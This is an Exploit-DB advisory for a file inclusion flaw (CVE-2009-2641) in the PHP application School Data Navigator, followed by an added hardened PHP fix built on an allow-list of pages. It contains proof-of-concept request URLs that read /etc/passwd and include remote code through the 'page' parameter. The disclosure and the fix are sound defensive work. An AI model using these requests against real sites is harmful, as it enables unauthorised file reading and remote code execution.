- 18 Dec 2022
- EDB-ID
- 8924
- EDB Verified
- Passed
- Author
- BR0LY
- Vulnerability type
- WEBAPPS
- Platform
- PHP
- CVE
- cve-2009-2641
- Publication date
- 2009-06-10
Code:
----------------------------------------------------------------------------------------------------
Name : School Data Navigator
Site : http://sourceforge.net/projects/school-data-nav/
Down : http://216.92.6.173/data_navigator/app_and_readme.zip
----------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------
Description:
Bug : Local/Remote File Inclusion
Look at this: index.php:48: require($page); The variable was not declared properly.
If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;
----------------------------------------------------------------------------------------------------
P0c:
LFI:http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]
OBS: need register_globals=on;
----------------------------------------------------------------------------------------------------
# milw0rm.com [2009-06-10]
- Source
- www.exploit-db.com
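
A hardened replacement for the `require($page)` pattern described in the advisory above, as an added example (not code from the original post or from School Data Navigator): the request value only selects a key from an allow-list and never becomes part of a path. The page keys, file names and `pages/` directory are assumptions.

```php
<?php
// Added example: not the School Data Navigator source. Page keys, file
// names and the pages/ directory below are hypothetical.

// Vulnerable pattern reported in the advisory (kept as a comment):
//   require($page);   // $page is never initialised, so with
//                     // register_globals=on the request supplies it.

// Allow-list: request key => file shipped with the application.
const PAGES = [
    'home'     => 'home.php',
    'students' => 'students.php',
    'reports'  => 'reports.php',
];
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map the untrusted "page" parameter to a path from the allow-list.
 * Returns null when the key is unknown or the file is not inside PAGE_DIR.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-string input are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // realpath() returns false for missing files; the prefix check guards
    // against a symlinked entry that points outside the page directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Read only from $_GET and always assign, so $page never comes from an
// implicitly created global variable.
$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
require $page;
```

Turning off `register_globals` and `allow_url_include` in php.ini narrows the exposure as defence in depth; the allow-list is what removes the inclusion bug.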